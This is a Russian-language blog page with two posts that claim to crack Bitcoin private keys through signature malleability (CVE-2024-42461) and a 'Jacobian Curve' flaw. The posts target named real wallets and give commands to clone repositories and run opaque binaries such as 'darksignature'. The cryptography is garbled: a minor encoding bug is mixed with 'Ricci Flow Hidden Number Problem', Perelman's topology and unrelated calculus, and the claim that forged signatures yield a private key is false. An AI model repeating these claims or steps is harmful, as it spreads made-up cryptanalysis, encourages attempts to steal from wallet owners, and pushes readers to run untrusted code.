CryptoDeepTech

CryptoDeepTech

https://cryptodeeptool.ru
Пикабушник
36 рейтинг 25 подписчиков 0 подписок 63 поста 0 в горячем
Награды:
5 лет на Пикабу

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1]

Данное исследование криптоанализа разделена на три части. В первой части статьи мы провели большое исследование уязвимости Signature Malleability, угрожающей безопасности популярных криптовалют, таких как Bitcoin и Ethereum. Во второй части статьи мы рассмотрели на реальном примере механизмы эксплуатации CVE-2024-42461 в библиотеке Elliptic для ECDSA, используя биткоин-кошелек 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw, на котором были потеряны монеты на сумму 21.2529214 BTC, что на ноябрь 2024 года составляет 1,744,572.51 USD. В третьей части статьи мы рассмотрим методы поиска уязвимости Signature Malleability, как предотвращение угрозы для собственного криптовалютного кошелька Bitcoin и Ethereum мы можем воспользоваться и применить на примерах различных методов машинного обучение. Также мы воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Уязвимость, известная как Signature Malleability, представляет собой серьезную угрозу для криптовалют Bitcoin и Ethereum, использующих алгоритм цифровой подписи на эллиптических кривых (ECDSA). Эта уязвимость позволяет злоумышленникам манипулировать подписями, создавая недействительные, но приемлемые для системы подписи. В данной статье рассматриваются механизмы эксплуатации этой уязвимости, ее последствия для безопасности криптовалют и предложенные меры по ее устранению. ECDSA (Elliptic Curve Digital Signature Algorithm) — это алгоритм, который широко используется для создания цифровых подписей транзакции перевода монет BTC или ETH в криптовалютах Bitcoin и Ethereum. Подпись состоит из двух компонентов: r и s, которые зависят от случайного одноразового номера k (NONCE) и приватного ключа x (PrivKey) подписанта.

Как возникает уязвимость Signature Malleability в транзакции Bitcoin?

Уязвимость Signature Malleability возникают из-за того, что существует возможность изменить значение s в подписи, сохраняя при этом действительность подписи. Это возможно благодаря тому, что для одной и той же подписи можно получить несколько эквивалентных значений (r,s′):

(где n — порядок группы эллиптической кривой secp256k1). Таким образом, злоумышленник может создать новую подпись, которая будет принята системой как действительная. Недостаточная проверка значений: Если значения r и s не проверяются на допустимые диапазоны (например, должны находиться в пределах от 1 до n−1), это может позволить злоумышленникам использовать некорректные значения для создания поддельных подписей.

CVE-2024-42461: Signature Malleability в библиотеке Elliptic для ECDSA

Одной из таких уязвимостей является CVE-2024-42461, обнаруженная в библиотеке Elliptic, используемой для реализации алгоритма цифровой подписи ECDSA (Elliptic Curve Digital Signature Algorithm). CVE-2024-42461 затрагивает версию 6.5.6 библиотеки Elliptic для Node.js и классифицируется как уязвимость низкой степени серьезности с оценкой CVSS 5.3. Проблема заключается в том, что библиотека допускает использование подписей, закодированных в формате BER (Basic Encoding Rules). Это создает возможность для злоумышленников изменять подписи без их аннулирования, что открывает путь для различных атак.

CVE-2024-42461 представляет собой уязвимость, обнаруженную в библиотеке Elliptic, используемой для реализации алгоритма цифровой подписи ECDSA (Elliptic Curve Digital Signature Algorithm) в Node.js. Эта уязвимость связана с Ricci Flow Hidden Number Problem (Ricci Flow HNP), что делает её особенно важной для безопасности криптографических приложений. Hidden Number Problem — это математическая задача, которая заключается в нахождении скрытого числа, использованного в процессе шифрования. В контексте ECDSA, если злоумышленник может решить HNP, это может привести к компрометации приватных ключей. Уязвимость CVE-2024-42461 позволяет потенциальному атакующему извлечь информацию о приватных ключах из подписей, что ставит под угрозу целостность цифровых подписей и аутентификацию пользователей. Данная уязвимость открывает широкий спектр атак, т.к. уязвимость может быть использована в различных атаках, включая атаки на аутентификацию и целостность данных. Это может вызвать серьезные проблемы для систем, полагающихся на ECDSA для обеспечения безопасности транзакций криптовалюты Биткоин и Эфириум.

Компрометация приватных ключей : Успешное решение Ricci Flow HNP может позволить злоумышленнику получить доступ к приватным ключам, что приведет к возможности подделки подписей транзакции Биткоин и Эфириум.

Ricci Flow HNP

Ricci Flow HNP (Ricci Flow Hidden Number Problem) стал ключевым инструментом в доказательстве таких теорем, как Thurston elliptization conjecture, Geometrization conjecture и Poincaré conjecture, которые касаются топологии многообразий. Гамильтон и позже Григорий Перельман использовали этот подход для получения глубоких результатов о структуре многообразий, это может означать использование потока для выявления и анализа скрытых геометрических характеристик многообразий, что позволяет делать выводы о их топологии и других свойствах.

Поток Риччи тесно связан с теорией кривизны, поскольку он использует тензор Риччи для описания изменений римановой метрики на многообразии.

Основные связи между потоком Риччи и кривизной

  • Тензор Риччи: Поток Риччи основан на тензоре Риччи, который является средним значением секционных кривизны. Он отражает, как изменяется форма многообразия в зависимости от его кривизны, где формулируется как задача нахождения скрытого числа, когда известны результаты функции, примененной к комбинациям этого числа с известными элементами. Это может быть полезно в контексте криптографии, особенно в системах с публичным ключом, где важно минимизировать утечку информации о приватных ключах

  • Динамика кривизны: В процессе потока Риччи метрика изменяется таким образом, что кривизна может увеличиваться или уменьшаться. Это позволяет анализировать, как геометрические свойства многообразия влияют на его топологию.

  • Сингулярности: Поток Риччи может приводить к сингулярностям — точкам, где кривизна становится бесконечной. Изучение этих сингулярностей имеет ключевое значение для понимания долгосрочного поведения потока и его применения в решении топологических задач, таких как гипотеза Пуанкаре.

  • Принцип максимума: Поток Риччи сохраняет положительность скалярной кривизны, что позволяет использовать принципы максимума для анализа геометрических свойств многообразий в процессе деформации.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

В контексте эллиптических кривых, потоки Риччи могут быть использованы для анализа их геометрических свойств и понимания взаимосвязей между различными структурами на этих кривых. Индикатриса кривизны, или индикатриса Дюпена, строится в касательной плоскости в данной точке поверхности по следующему правилу. Координатные оси в касательной плоскости совмещают с главными направлениями. На луче, расположенном в каждом направлении, откладывают отрезок, равный величине, обратной квадратному корню из нормальной кривизны поверхности в этом направлении

Классификация точек поверхности

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Существуют поверхности, состоящие из точек одного, двух или трех типов.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

это квадратное уравнение может иметь один или два корня — асимптотических направления, или не иметь корней. Наличие корня поставляет обыкновенное дифференциальное уравнение первого порядка, указание точки поверхности задает начальные условия для его решения. Теорема существования и единственности решения задачи Коши для обыкновенного дифференциального уравнения первого порядка, доказываемая в курсах математического анализа, приводит к следующему геометрическому результату. На поверхности, состоящей из эллиптических точек, действительных асимптотических линий нет; на поверхности, состоящей из гиперболических точек, имеется асимптотическая сеть; на поверхности, состоящей из параболических точек, не являющихся точками уплощения, через каждую точку проходит единственная асимптотическая линия.

Оптимизация алгоритмов

Методы, разработанные в рамках теории потоков Риччи, могут быть адаптированы для оптимизации вычислений в эллиптической криптографии, особенно в контексте операций над точками на эллиптических кривых secp256k1. Таким образом, поток Риччи не только служит инструментом для изучения изменения метрик, но и предоставляет глубокую связь между геометрией и топологией через анализ кривизны. Возьмем к примеру числа «N» и «P» которые являются важными параметрами в контексте эллиптической криптографии, особенно в стандарте secp256k1, который широко используется в блокчейне и криптовалюте Bitcoin и Ethereum.

Значение числа N

N — это порядок группы точек на эллиптической кривой. Он определяет максимальное количество точек, которые могут быть использованы для генерации ключей в криптографических алгоритмах. В случае secp256k1, значение N равно:

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

Это число также указывает на то, что при работе с этой кривой все операции должны выполняться в пределах этого порядка

Значение числа P

P — это характеристика самой эллиптической кривой, представляющая собой простое число, которое определяет поле, в котором происходит работа с точками на кривой. Значение P для secp256k1:

P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f

Это число задает размер поля, что важно для определения диапазона возможных значений координат точек на кривой.

Разница между N и P

  • Порядок группы (N): Определяет количество точек на кривой, которые могут быть использованы для криптографических операций.

  • Простое число (P): Определяет поле, в котором работает кривая. Это число важно для математических операций над точками на кривой.

Таким образом, хотя оба числа играют ключевую роль в обеспечении безопасности и функциональности криптографических систем, они выполняют разные функции: Nкасается структуры группы точек, а Pструктуры поля.

Вертикальное положение значение N и P

Python скрипт: value_n.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Python скрипт: value_p.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Как реализовать уязвимость Signature Malleability в транзакции Bitcoin?

Для реализации полноценной атаки на Биткоин, с использованием уязвимости Signature Malleability необходимо изменить эквивалентное значение (s′) как это показано во втором столбце таблицы компонентов значении (R, S, Z) цифровой подписи в ECDSA.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

36SignatureMalleability/Ricci_Flow_Hidden_Number_Problem.txt

P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f

Для успешной атаки на Биткоин достаточно 32 транзакции подписи ECDSA, где изменив две начальные цифры HEX в эквивалентном значение (s′) мы выстраиваем таблицу для определения диапазона возможных значений координат точек на кривой, а также оптимизация математических алгоритмов разработанные в рамках теории потоков Риччи. Поскольку потоки Риччи тесно связаны с теорией кривизны, мы можем воспользоваться средним значением секционной кривизны и решить проблему скрытых чисел, где применяя полученные данные к 32 транзакциям Биткоина мы извлекаем из заданных значении (R, S, Z) начальные данные для секретных ключей: (k′) NONCE для 32 транзакции Биткоина и с помощью инструмента Ricci Flow HNP (Ricci Flow Hidden Number Problem) мы находим скрытое число: (x′) PrivKey — приватный ключ.

Значения R и S являются основными компонентами цифровой подписи в ECDSA

Значение R представляет собой координату точки на эллиптической кривой, которая получается в результате математических операций, связанных с приватным ключом и случайным числом (так называемым «криптографическим случайным числом»). Это значение обеспечивает уникальность подписи для каждого сообщения, даже если оно подписывается одним и тем же приватным ключом.

Значение S вычисляется на основе дайджеста сообщения (хеш-функции) и приватного ключа. Оно связано с тем, насколько успешно подпись подтверждает подлинность сообщения. Значение S также зависит от значения R и случайного числа.

Как формируются R и S (метод проверки подписи)

Процесс генерации значений R и S включает следующие шаги:

  1. Генерация дайджеста сообщения: Сначала создается хеш сообщения с помощью алгоритма, например SHA-256.

  2. Выбор случайного числа: Генерируется случайное число, которое используется для создания точки на эллиптической кривой.

  3. Вычисление R: Используя это случайное число, вычисляется координата точки на кривой, которая становится значением R.

  4. Вычисление S: Значение S рассчитывается с учетом дайджеста сообщения и приватного ключа.

При проверке подписи получатель использует значения R и S вместе с публичным ключом отправителя и дайджестом сообщения для подтверждения подлинности подписи. Если все вычисления подтверждают соответствие, это означает, что сообщение действительно было подписано владельцем соответствующего приватного ключа.

Как получить значение R, S, Z из RawTX (метод декодирование подписи)

RawTX (сырая транзакция) представляет собой закодированное представление транзакции Биткоина в шестнадцатеричном формате. Она содержит все данные, необходимые для выполнения транзакции Биткоина.

Извлечение R, S, Z:

  • Подпись в ECDSA состоит из двух компонентов: R и S. После декодирования RawTX найдите поле, содержащее подпись (обычно это часть входа транзакции).

  • Подпись будет представлена в виде DERкодировки. Вам нужно будет извлечь значения R и S из этой подписи. Обычно они представлены как два целых числа, которые можно выделить с помощью десериализации.

  • Значение Z — это хэш сообщения, которое подписывается. Для получения Z вам нужно выполнить хэширование данных транзакции (обычно с использованием SHA-256), которые были подписаны.

Декодируем RawTX с помощью инструмента decoderaw

Для начало получим RawTX закодированную транзакцию Биткоина в шестнадцатеричном формате. 1

Откроем новый блокнот в Google Colab

Сommands:

!git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction....

cd Broadcast-Bitcoin-Transaction/

!python setup.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Сommands:

cd decoderaw/

!chmod +x decoderaw

ls

!./decoderaw

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Сommands:

!./decoderaw 01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Result: 1111,0097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0,1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5,931a52e8610cf87b6d00875f687042224c305865fd20ecb15ef76b1277ba10fd,0000

Практическая часть

Из теории уязвимость CVE-2024-42461 известно, что злоумышленники могут использовать некорректные значения для создания поддельных подписей транзакции. Перейдем к практической части статьи и рассмотрим пример с использованием Биткоин кошелька: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw , где были потерянный монеты на сумму: 21.2529214 BTC на ноябрь 2024 года эта сумма составляет: 1744572,51 USD

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Решение дифференциального уравнения

Решения дифференциальных уравнений помогают моделировать различные процессы, данная формула позволяет нам понять и предсказать поведение различных систем в зависимости от изменения переменных.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Общее решение дифференциального уравнения, где функция y зависит от переменной x.

  1. Исходное уравнение:

    • Левую часть уравнения можно интерпретировать как производную функции y по x, которая равна произведению двух функций: g(y), зависящей от y, и h(x), зависящей от x.

  2. Переписывание уравнения:

    • Уравнение можно переписать в форме, которая отделяет переменные:

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Это позволяет интегрировать обе стороны отдельно.

После разделения переменных, мы можем в точности интегрировать обе стороны:

Левую сторону относительно y:

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Правую сторону относительно x:

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Исследуем взаимосвязь между переменными через интеграцию [ frac{dy}{dx} = g(y)h(x) quad Rightarrow quad frac{1}{g(y)} dy = h(x) dx ] и применим инструмент для математического анализа и решения дифференциальных уравнений.

Perelman Work

Пример №1 с использованием инструмента DarkSignature:

Перейдем обратно в корневой каталог репозитории Broadcast Bitcoin Transaction

Сommands:

cd - ls

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Сommands:

cd darksignature/

!chmod +x darksignature

ls

!./darksignature

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Для получение публичного ключа к Биткоин Адресу 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw выбираем команду:

darksignature -address <Bitcoin Address>

Вводим Биткоин адрес и получаем публичный ключ:

!./darksignature -address 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Результат:

pubkey: (HEX) = 049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461

Пример №2 с использованием инструмента Dockeyhunt Lattice Attack:

Запускаем программное обеспечение Dockeyhunt Lattice Attack и в поле "Input date" вводим Биткоин Адрес 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw и получаем публичный ключ кошелька:

049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Видео с привязкой ко времени

Воспользуемся инструментом DarkSignature чтобы получить поддельные данные значение R, S, Z для транзакции алгоритма ECDSA. В поле "Input date" вводим публичный ключ Биткоин Адреса 049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461 и получаем данные значение R, S, Z в количестве будет составлять 32 транзакции Биткоина.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Видео с привязкой ко времени

Применим получение поддельные данные значение R, S, Z для транзакции алгоритма ECDSA в Google Colab

Установим модуль ECDSA:

pip install ecdsa

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Для получение координат (Gx, Gy) для публичного ключа воспользуемся Python-скриптом: darksignature/coordinates.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Воспользуемся командой darksignature -pubkey <Gx Gy>

Запускаем код Python-скрипта: darksignature/transactions.py и получаем данные значение R, S, Z в количестве будет составлять 32 транзакции Биткоина.

После генерации мы получаем файл: SignatureRSZ.txt

Также в корневом каталоге: c:\PerelmanWork\Dockeyhunt Lattice Attack\ мы получаем файл: Signatures.txt

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост
Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №1] Криптовалюта, Биткоины, Арбитраж криптовалюты, Финансовая грамотность, Заработок в интернете, Заработок, Видео, YouTube, Длиннопост

Видео с привязкой ко времени

Вторая часть статьи

Показать полностью 23 1
1

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька

CRYPTO DEEP TECH

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В данной статье рассмотрим на примере уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve). В последние годы криптовалюты, такие как Биткоин, стали важной частью финансовой экосистемы. Однако с ростом их популярности увеличивается и количество угроз, связанных с кибербезопасностью. Одной из таких угроз является уязвимость алгоритма Jacobian Curve, которая затрагивает алгоритм цифровой подписи эллиптической кривой (ECDSA). Эта уязвимость позволяет злоумышленникам генерировать поддельные подписи, что может привести к серьезным последствиям для пользователей и целостности сети Биткоин.

Jacobian Curve algorithm vulnerability относится к недостаткам в реализации криптографии эллиптических кривых, в частности, затрагивающим ECDSA. Злоумышленники могут манипулировать математическими свойствами координат Якоби, используемых в вычислениях эллиптических кривых, что позволяет им создавать мошеннические транзакции с поддельными подписями, также Jacobian Curve algorithm vulnerability связана с недостатками в реализации криптографии эллиптических кривых, применяемых в ECDSA. Эта уязвимость позволяет злоумышленникам манипулировать математическими свойствами координат Якоби, используемых для генерации цифровых подписей. В результате таких манипуляций злоумышленники могут создавать мошеннические транзакции с поддельными подписями, которые будут приняты системой Биткоин как действительные.

Уязвимость возникает в процессе десериализации данных, который может быть использован для внедрения вредоносного кода и создания ложных подписей. В случае неправильной обработки данных злоумышленники получают возможность подделывать подписи ECDSA, что ставит под угрозу целостность системы Биткоин.

Потенциальные последствия

Основная угроза, связанная с этой уязвимостью, заключается в возможности несанкционированного доступа к средствам пользователей. Злоумышленники могут использовать поддельные подписи для создания транзакций, которые переводят биткоины из кошельков ничего не подозревающих пользователей на свои собственные счета. Это не только подрывает доверие к системе, но и может привести к значительным финансовым потерям для пользователей. Поддельные подписи позволяют злоумышленникам переводить средства с кошельков жертв на свои счета. Более того, такие атаки могут нарушить целостность блокчейна, создавая угрозу двойной траты и разрушая основной принцип работы системы.

Атака «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая «приватные ключи пользователей».

Если определенные узлы в сети Биткоин скомпрометированы, это может привести к разветвлению блокчейна на несовместимые цепочки, создавая путаницу и потенциальные проблемы двойной траты. Кроме того, злоумышленники могут использовать эту уязвимость для запуска атак типа «отказ в обслуживании» (DoS), заполняя сеть недействительными транзакциями, что может сделать ее недоступной для законных пользователей.

Успешная эксплуатация этой уязвимости, также может вызвать рассогласование в состоянии консенсуса сети Биткоин, что приведет к разделению цепи блоков на несовместимые ветви. В результате могут возникнуть атаки типа «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая приватные ключи пользователей.

Механизмы эксплуатации и влияние на мультиподписи

Уязвимость алгоритма Jacobian Curve особенно опасна для систем, использующих схемы мультиподписи, где для завершения транзакции требуется несколько подписей от разных участников. Злоумышленник может сгенерировать поддельные подписи, которые будут приняты системой, что ставит под угрозу не только отдельные транзакции, но и весь процесс использования мультиподписи.

Как нам стало известно, если входные данные пользователей не проверяются должным образом, это может привести к серьезным сбоям в работе системы Биткоин, где злоумышленник может воспользоваться моментом и внедрить вредоносный код и в конечном итоге манипулировать системой с помощью создание поддельной подписями в транзакций Биткоин.

Практическая часть

Из теории уязвимости алгоритма Jacobian Curve известно, что злоумышленники могут использовать уязвимость для проведения атак DoS, перегружая сеть недействительными транзакциями, что дестабилизирует работу сети Биткоин. Перейдем к практической части статьи и рассмотрим пример с использованием Биткоин кошелька: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 , где были потерянный монеты на сумму: 266.03138481 BTC на август 2024 года эта сумма составляет: 15747770,36 USD

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

266.03138481 BTC > 15747770,36 USD

Tutorials Power AI

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git cd Tutorials-Power-AI/ python3 tutorials.py

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения закрытого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve) для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/17PN1uHeeGhQFTKRx6s8OS3YftgxNvQzd#scrollTo=2dl8T79mn1YL

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

Откроем опцию от BlockCypher “Decode A Transaction”:

https://live.blockcypher.com/btc/decodetx/

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Обратим внимание на Bitcoin HASH160: 334a75f1d3bbefa5b761e5fa53e60bce2a822879

https://github.com/demining/CryptoDeepTools/blob/50de2ffdd7f9f06a34049d1c72559aa16b1bf42c/35JacobianCurve/DecodeRawTX.txt#L31C30-L31C70

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 отправляет 1234 satoshi на тот же адрес внутри своей сети.

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост
Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/wif_to_hash160.py

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/KEYFOUND.privkey

BitcoinChatGPT №4 Jacobian Curve Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

